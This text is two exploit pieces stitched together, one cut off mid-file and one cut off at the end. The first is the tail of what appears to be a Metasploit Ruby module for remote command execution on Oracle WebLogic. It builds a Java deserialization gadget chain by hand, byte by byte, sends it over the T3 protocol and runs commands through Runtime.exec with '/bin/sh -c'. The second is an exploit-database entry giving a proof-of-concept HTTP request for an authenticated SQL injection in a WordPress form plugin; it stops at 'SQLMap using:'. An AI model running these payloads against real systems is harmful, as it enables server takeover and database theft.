SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7872' # end block data, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable payload_obj << '5468726f7761626c65' payload_obj << 'd5c635273977b8cb' # SerialVersionUID payload_obj << '030004' # ?, then 4 fields payload_obj << '4c0005' # Field type: Object, field name length: 5 payload_obj << '6361757365' # Field name: cause payload_obj << '740015' # String, length: 21 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable; payload_obj << '2f5468726f7761626c653b' payload_obj << '4c000d' # Field type: Object, field name length: 13 payload_obj << '64657461696c4d657373616765' # Field name: detailMessage payload_obj << '740012' # String, length: 18 payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; payload_obj << '2f537472696e673b' payload_obj << '5b000a' # Field type: 5b = array, field name length: 10 payload_obj << '737461636b5472616365' # Field name: stackTrace payload_obj << '74001e' # String, length: 30 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement; payload_obj << '672f537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '4c0014' # Field type: Object, field name length: 20 payload_obj << '73757070726573736564' # Field name: suppressedExceptions payload_obj << '457863657074696f6e73' payload_obj << '740010' # String, length: 16 payload_obj << '4c6a6176612f7574696c' # Ljava/util/List; payload_obj << '2f4c6973743b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '71' # TC_REFERENCE payload_obj << '007e0008' # handle? 
payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement; payload_obj << '672e537461636b547261' payload_obj << '6365456c656d656e743b' payload_obj << '02462a3c3cfd2239' # SerialVersionUID payload_obj << '020000' # Serializable, No fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000001' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '001b' # Class name length: 27 payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement payload_obj << '537461636b5472616365' payload_obj << '456c656d656e74' payload_obj << '6109c59a2636dd85' # SerialVersionUID payload_obj << '020004' # Serializable, 4 fields payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10 payload_obj << '6c696e654e756d626572' # lineNumber payload_obj << '4c000e' # Field type: Object, field name length: 14 payload_obj << '6465636c6172696e6743' payload_obj << '6c617373' # declaringClass payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '66696c654e616d65' # fileName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '4c000a' # Field type: Object, field name length: 10 payload_obj << '6d6574686f644e616d65' # methodName payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000028' class_name = Rex::Text.rand_text_alphanumeric(8..14) formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join payload_obj << '74' # String payload_obj << class_name.length.to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name payload_obj << '74' # String payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0') payload_obj << formatted_class # Originally 
Weblogic_2555.java payload_obj << '2e6a617661' # .java payload_obj << '740004' # String, length: 4 payload_obj << '6d61696e' # main payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0026' # Class name length: 38 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c654c697374' payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0004' # Field type: Object, field name length: 4 payload_obj << '6c697374' # list payload_obj << '71' # TC_REFERENCE payload_obj << '007e0007' # handle payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection payload_obj << '436f6c6c656374696f6e' payload_obj << '7324556e6d6f64696669' payload_obj << '61626c65436f6c6c6563' payload_obj << '74696f6e' payload_obj << '19420080cb5ef71e' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '4c0001' # Field type: Object, field name length: 1 payload_obj << '63' # Field name: c payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection; payload_obj << '2f436f6c6c656374696f' payload_obj << '6e3b' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList payload_obj << '41727261794c697374' payload_obj << '7881d21d99c7619d' # SerialVersionUID payload_obj << '030001' # ?, 1 field payload_obj << '490004' # Field type: Integer, field name length: 4 payload_obj << '73697a65' # size payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7704' # TC_BLOCKDATA, length: 4 payload_obj << '00000000' payload_obj << '7871' # 
TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << '007e0015' # handle payload_obj << '78' # TC_ENDBLOCKDATA payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '0024' # Class name length: 36 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter payload_obj << '6f6c2e7574696c2e6669' payload_obj << '6c7465722e4c696d6974' payload_obj << '46696c746572' payload_obj << limit_filter_uid # SerialVersionUID payload_obj << '020006' # Serializable, 6 fields payload_obj << '49000b' # Field type: Integer, field name length: 11 payload_obj << '6d5f635061676553697a65' # m_cPageSize payload_obj << '490007' # Field type: Integer, field name length: 7 payload_obj << '6d5f6e50616765' # m_nPage payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f636f6d70617261746f72' # m_comparator payload_obj << '740016' # String, length: 22 payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator; payload_obj << '2f436f6d70617261746f' payload_obj << '723b' payload_obj << '4c0008' # Field type: Object, field name length: 8 payload_obj << '6d5f66696c746572' # m_filter payload_obj << '74001a' # String, length: 26 payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter; payload_obj << '736f6c2f7574696c2f46' payload_obj << '696c7465723b' payload_obj << '4c000f' # Field type: Object, field name length: 15 payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom payload_obj << '6f74746f6d' payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle payload_obj << '4c000c' # Field type: Object, field name length: 12 payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop payload_obj << '71' # TC_REFERENCE payload_obj << '007e0001' # handle unless @version_no == Gem::Version.new('12.1.3.0.0') payload_obj << add_class_desc end payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '00000000' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002c' # Class name length: 44 
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4368' payload_obj << '61696e65644578747261' payload_obj << '63746f72' payload_obj << chained_extractor_uid # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '0036' # Class name length: 54 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '737472616374436f6d70' payload_obj << '6f736974654578747261' payload_obj << '63746f72' payload_obj << '086b3d8c05690f44' # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '5b000c' # Field type: Array, field name length: 12 payload_obj << '6d5f61457874726163746f72' # m_aExtractor payload_obj << '740023' # String, length: 35 payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor; payload_obj << '6f736f6c2f7574696c2f' payload_obj << '56616c75654578747261' payload_obj << '63746f723b' payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC payload_obj << '002d' # Class name length: 45 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e4162' payload_obj << '73747261637445787472' payload_obj << '6163746f72' payload_obj << abstract_extractor_uid # SerialVersionUID payload_obj << '020001' # Serializable, 1 field payload_obj << '490009' # Field type: Integer, field name length: 9 payload_obj << '6d5f6e546172676574' # m_nTarget payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0032' # Class name length: 50 payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor; payload_obj << '6f736f6c2e7574696c2e' 
payload_obj << '657874726163746f722e' payload_obj << '5265666c656374696f6e' payload_obj << '457874726163746f723b' payload_obj << 'dd8b89aed70273ca' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC payload_obj << '002f' # Class name length: 47 payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor payload_obj << '6f6c2e7574696c2e6578' payload_obj << '74726163746f722e5265' payload_obj << '666c656374696f6e4578' payload_obj << '74726163746f72' payload_obj << reflection_extractor_uid # SerialVersionUID payload_obj << '02000' # Serializable, variable fields orig: 020002 payload_obj << reflect_extract_count payload_obj << '5b0009' # Field type: Array, field name length: 9 payload_obj << '6d5f616f506172616d' # m_aoParam payload_obj << '740013' # String, length: 19 payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object; payload_obj << '672f4f626a6563743b' payload_obj << add_sect payload_obj << '4c0009' # Object, length: 9 payload_obj << '6d5f734d6574686f64' # m_sMethod payload_obj << '71' # TC_REFERENCE payload_obj << '007e0005' # handle payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE payload_obj << (change_handle? ? 
'007e001d' : '007e001e') payload_obj << '00000000' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object; payload_obj << '672e4f626a6563743b' payload_obj << '90ce589f1073296c' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000002' payload_obj << '74000a' # String, length: 10 payload_obj << '67657452756e74696d65' # getRuntime payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0012' # Class name length: 18 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class; payload_obj << '672e436c6173733b' payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740009' # String, length: 9 payload_obj << '6765744d6574686f64' # getMethod payload_obj << '7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000002' # array size: 2 payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '71' # TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740006' # TC_STRING, length: 6 payload_obj << '696e766f6b65' # invoke payload_obj << '7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? 
'007e0024' : '007e0025') payload_obj << '00000001' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String; payload_obj << '672e537472696e673b' payload_obj << 'add256e7e91d7b47' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_bin = format_payload(payload_data) payload_obj << payload_bin # Original data # --------------------------- # payload_obj << '740007' # String, length: 7 # payload_obj << '2f62696e2f7368' # /bin/sh # payload_obj << '740002' # String, length: 2 # payload_obj << '2d63' # -c # payload_obj << '740017' # String, length: 23 # payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah # payload_obj << '2f626c61685f7a655f62' # payload_obj << '6c6168' # --------------------------- payload_obj << add_tc_null payload_obj << '740004' # String, length: 4 payload_obj << '65786563' # exec payload_obj << '7070' # TC_NULL, TC_NULL payload_obj << '7672' # TC_CLASS, TC_CLASSDESC payload_obj << '0011' # Class name length: 17 payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime payload_obj << '52756e74696d65' payload_obj << '00000000000000000000' payload_obj << '00' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL end def change_handle? 
# True only for 12.1.3.0.0; build_payload_obj (above, its start is outside
# this excerpt) uses it to choose between two sets of TC_REFERENCE handles
# (e.g. 007e0021 vs 007e0022).
@version_no == Gem::Version.new('12.1.3.0.0')
end

# SerialVersionUID (hex) for the "limit filter" class descriptor, keyed by
# the target version; presumably consumed by build_payload_obj. The else
# branch covers every other version the module accepts.
def limit_filter_uid
  case @version_no
  when Gem::Version.new('12.1.3.0.0')
    '99022596d7b45953'
  when Gem::Version.new('12.2.1.3.0')
    'ab2901b976c4e271'
  else
    '954e4590be89865f'
  end
end

# SerialVersionUID (hex) for the "chained extractor" class descriptor, per version.
def chained_extractor_uid
  case @version_no
  when Gem::Version.new('12.1.3.0.0')
    '889f81b0945d5b7f'
  when Gem::Version.new('12.2.1.3.0')
    '06ee10433a4cc4b4'
  else
    '435b250b72f63db5'
  end
end

# SerialVersionUID (hex) for the "abstract extractor" class descriptor, per version.
def abstract_extractor_uid
  case @version_no
  when Gem::Version.new('12.1.3.0.0')
    '658195303e723821'
  when Gem::Version.new('12.2.1.3.0')
    '752289ad4d460138'
  else
    '9b1be18ed70100e5'
  end
end

# SerialVersionUID (hex) for the "reflection extractor" class descriptor, per version.
def reflection_extractor_uid
  case @version_no
  when Gem::Version.new('12.1.3.0.0')
    'ee7ae995c02fb4a2'
  when Gem::Version.new('12.2.1.3.0')
    '87973791b26429dd'
  else
    '1f62f564b951b614'
  end
end

# Field count (one hex digit, as a string) for the reflection extractor
# descriptor: 12.2.1.3.0 carries one extra field, emitted by add_sect.
def reflect_extract_count
  case @version_no
  when Gem::Version.new('12.2.1.3.0')
    '3'
  else
    '2'
  end
end

# Extra field descriptor emitted only for 12.2.1.3.0: an Object-typed field
# named m_extractorCached (name length 17) followed by a TC_REFERENCE back to
# handle 007e0001. Returns '' for every other version.
def add_sect
  sect = ''
  if @version_no == Gem::Version.new('12.2.1.3.0')
    sect << '4c0011' # Object, length: 17
    sect << '6d5f657874726163746f' # m_extractorCached
    sect << '72436163686564'
    sect << '71' # TC_REFERENCE
    sect << '007e0001' # handle
  end
  sect
end

# Class descriptor (hex) for com.tangosol.util.filter.AbstractQueryRecorderFilter:
# TC_ENDBLOCKDATA + TC_CLASSDESC, 52-byte class name, SerialVersionUID,
# flags 0x02 (Serializable) and zero fields. Identical for every version.
# Returns the descriptor because the last `<<` evaluates to class_desc.
def add_class_desc
  class_desc = ''
  class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  class_desc << '0034' # Class name length: 52
  class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
  class_desc << '6f6c2e7574696c2e6669'
  class_desc << '6c7465722e4162737472'
  class_desc << '61637451756572795265'
  class_desc << '636f7264657246696c74'
  class_desc << '6572'
  class_desc << 'f3b98201f680eb90' # SerialVersionUID
  class_desc << '020000' # Serializable, no fields
end

# A TC_NULL marker (0x70) is only inserted for 12.2.1.3.0; other versions get ''.
def add_tc_null
  return '70' if @version_no == Gem::Version.new('12.2.1.3.0')

  ''
end

# Wraps +payload_obj+ (a hex string) in a single T3 request and writes it to
# +sock+, which is not defined in this excerpt (presumably opened by the
# caller before execute_command runs).
#
# Layout, all hex: a 4-byte packet length placeholder (patched at the end),
# the CMD_IDENTIFY_REQUEST header, then several Java serialization streams,
# each introduced by the 'fe010000' separator and the aced0005 STREAM_MAGIC:
# a weblogic.rjvm.ClassTableEntry describing PackageInfo, the caller's
# payload_obj, a ClassTableEntry describing PeerInfo/VersionInfo/PackageInfo,
# and two weblogic.rjvm.JVMID objects whose host and IP strings
# (us-l-breens, 127.0.1.1) are constants carried over from the original capture.
#
# NOTE(review): the method never reads a reply; it sleeps a fixed second
# after the write, so success is not confirmed here.
def t3_send(payload_obj)
  print_status('Sending object...')
  request_obj = '000009f3' # Original packet length
  request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
  request_obj << 'ffffffffffffffff'
  request_obj << '00000071'
  request_obj << '0000ea60'
  request_obj << '00000018432ec6'
  request_obj << 'a2a63985b5af7d63e643'
  request_obj << '83f42a6d92c9e9af0f94'
  request_obj << '72027973720078720178'
  request_obj << '720278700000000c0000'
  request_obj << '00020000000000000000'
  request_obj << '00000001007070707070'
  request_obj << '700000000c0000000200'
  request_obj << '00000000000000000000'
  request_obj << '01007006'

  # Stream 1: ClassTableEntry for weblogic.common.internal.PackageInfo
  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '001d' # Class name length: 29
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
  request_obj << '6a766d2e436c61737354'
  request_obj << '61626c65456e747279'
  request_obj << '2f52658157f4f9ed' # SerialVersionUID
  request_obj << '0c0000' # flags?
  request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5061636b61'
  request_obj << '6765496e666f'
  request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
  request_obj << '020009' # Serializable, 9 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '4c0009' # Field type: Object, field name length: 9
  request_obj << '696d706c5469746c65' # implTitle
  request_obj << '740012' # String, length: 18
  request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
  request_obj << '2f537472696e673b'
  request_obj << '4c000a' # Field type: Object, field name length: 10
  request_obj << '696d706c56656e646f72' # implVendor
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '4c000b' # Field type: Object, field name length: 11
  request_obj << '696d706c56657273696f6e' # implVersion
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  request_obj << '7702' # TC_ENDBLOCKDATA
  request_obj << '000078'

  # Stream 2: the caller-supplied serialized object
  request_obj << 'fe010000' # separator
  request_obj << payload_obj

  # Stream 3: ClassTableEntry for PeerInfo -> VersionInfo -> PackageInfo
  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '001d' # Class name length: 29
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
  request_obj << '6a766d2e436c61737354'
  request_obj << '61626c65456e747279'
  request_obj << '2f52658157f4f9ed' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
  request_obj << '0021' # Class name length: 33
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5065657249'
  request_obj << '6e666f'
  request_obj << '585474f39bc908f1' # SerialVersionUID
  request_obj << '020007' # Serializable, 7 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '5b0008' # Field type: Array, field name length: 8
  request_obj << '7061636b61676573' # packages
  request_obj << '740027' # String, length: 39
  request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
  request_obj << '2f636f6d6d6f6e2f696e'
  request_obj << '7465726e616c2f506163'
  request_obj << '6b616765496e666f3b'
  request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5665727369'
  request_obj << '6f6e496e666f'
  request_obj << '972245516452463e' # SerialVersionUID
  request_obj << '020003' # Serializable, 3 fields
  request_obj << '5b0008' # Field type: Array, field name length: 8
  request_obj << '7061636b61676573' # packages
  request_obj << '71007e0003' # TC_REFERENCE, handle
  request_obj << '4c000e' # Field type: Object, field name length: 14
  request_obj << '72656c65617365566572' # releaseVersion
  request_obj << '73696f6e'
  request_obj << '740012' # String, length: 18
  request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
  request_obj << '2f537472696e673b'
  request_obj << '5b0012' # Field type: Array, field name length: 18
  request_obj << '76657273696f6e496e66' # versionInfoAsBytes
  request_obj << '6f41734279746573'
  request_obj << '740002' # String, length: 2
  request_obj << '5b42' # [B
  request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
  request_obj << '0024' # Class name length: 36
  request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
  request_obj << '6f6d6d6f6e2e696e7465'
  request_obj << '726e616c2e5061636b61'
  request_obj << '6765496e666f'
  request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
  request_obj << '020009' # Serializable, 9 fields
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d616a6f72' # major
  request_obj << '490005' # Field type: Int, field name length: 5
  request_obj << '6d696e6f72' # minor
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '70617463685570646174' # patchUpdate
  request_obj << '65'
  request_obj << '49000c' # Field type: Int, field name length: 12
  request_obj << '726f6c6c696e67506174' # rollingPatch
  request_obj << '6368'
  request_obj << '49000b' # Field type: Int, field name length: 11
  request_obj << '73657276696365506163' # servicePack
  request_obj << '6b'
  request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
  request_obj << '74656d706f7261727950' # temporaryPatch
  request_obj << '61746368'
  request_obj << '4c0009' # Field type: Object, field name length: 9
  request_obj << '696d706c5469746c65' # implTitle
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '4c000a' # Field type: Object, field name length: 10
  request_obj << '696d706c56656e646f72' # implVendor
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '4c000b' # Field type: Object, field name length: 11
  request_obj << '696d706c56657273696f' # implVersion
  request_obj << '6e'
  request_obj << '71007e0005' # TC_REFERENCE, handle
  request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
  request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA

  # Stream 4: weblogic.rjvm.JVMID with a hardcoded host name and address
  request_obj << 'fe00ff' # separator
  request_obj << 'fe010000'
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '0013' # Class name length: 19
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
  request_obj << '6a766d2e4a564d4944'
  request_obj << 'dc49c23ede121e2a' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
  request_obj << '4621'
  request_obj << '000000000000000000'
  request_obj << '09' # length: 9
  request_obj << '3132372e302e312e31' # 127.0.1.1
  request_obj << '000b' # length: 11
  request_obj << '75732d6c2d627265656e' # us-l-breens
  request_obj << '73'
  request_obj << 'a53caff10000000700'
  request_obj << '001b59'
  request_obj << 'ffffffffffffffffffff'
  request_obj << 'ffffffffffffffffffff'
  request_obj << 'ffffffff'
  request_obj << '0078'

  # Stream 5: a second JVMID, compact form
  request_obj << 'fe010000' # separator
  request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
  request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
  request_obj << '0013' # Class name length: 19
  request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
  request_obj << '6a766d2e4a564d4944'
  request_obj << 'dc49c23ede121e2a' # SerialVersionUID
  request_obj << '0c0000'
  request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
  request_obj << '1d0181401281'
  request_obj << '34bf427600093132372e'
  request_obj << '302e312e31a53caff1'
  request_obj << '000000000078'

  # Patch the leading 4-byte length: two hex characters per byte, so the
  # byte count is the hex string length / 2, written as 8 hex digits.
  new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
  request_obj[0, 8] = new_len
  sock.put([request_obj].pack('H*'))
  sleep(1)
end

# Encodes a shell command as the elements of a Java String[]: the command is
# split on spaces into at most three parts (matching the '00000003' array
# length build_payload_obj writes right before calling this), and each part
# becomes TC_STRING (0x74), a 2-byte length, and the hex of its bytes.
#
# NOTE(review): the length prefix uses String#length (characters) while the
# body is written per byte, so a part containing multi-byte characters gets
# an undercounted length — confirm whether non-ASCII commands are expected.
def format_payload(payload_cmd)
  print_status('Formatting payload...')
  payload_arr = payload_cmd.split(' ', 3)
  formatted_payload = ''
  payload_arr.each do |part|
    formatted_payload << '74' # denotes a string
    formatted_payload << part.length.to_s(16).rjust(4, '0')
    formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
  end
  formatted_payload
end

# Exploit entry point for a single command: wraps +cmd+ in '/bin/sh -c',
# serializes it via build_payload_obj and sends it with t3_send.
# String#prepend mutates the caller's +cmd+ in place. +_opts+ is accepted
# for interface compatibility and unused.
def execute_command(cmd, _opts = {})
  cmd.prepend('/bin/sh -c ')
  cmd = build_payload_obj(cmd)
  t3_send(cmd)
end
end
-
WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
# Exploit Title: WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Date: 2020 - 5 - 22
# Vendor Homepage: https://help.10web.io/
# Version: <= 5.4.1
# Tested on: Ubuntu 18.04

Description:
SQL injection in the Form Maker by 10Web WordPress plugin before 5.4.1 exists via the 's' parameter of /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1".

PoC:

GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1
Host: test-wp.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574; PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb
Upgrade-Insecure-Requests: 1

SQLMap using:
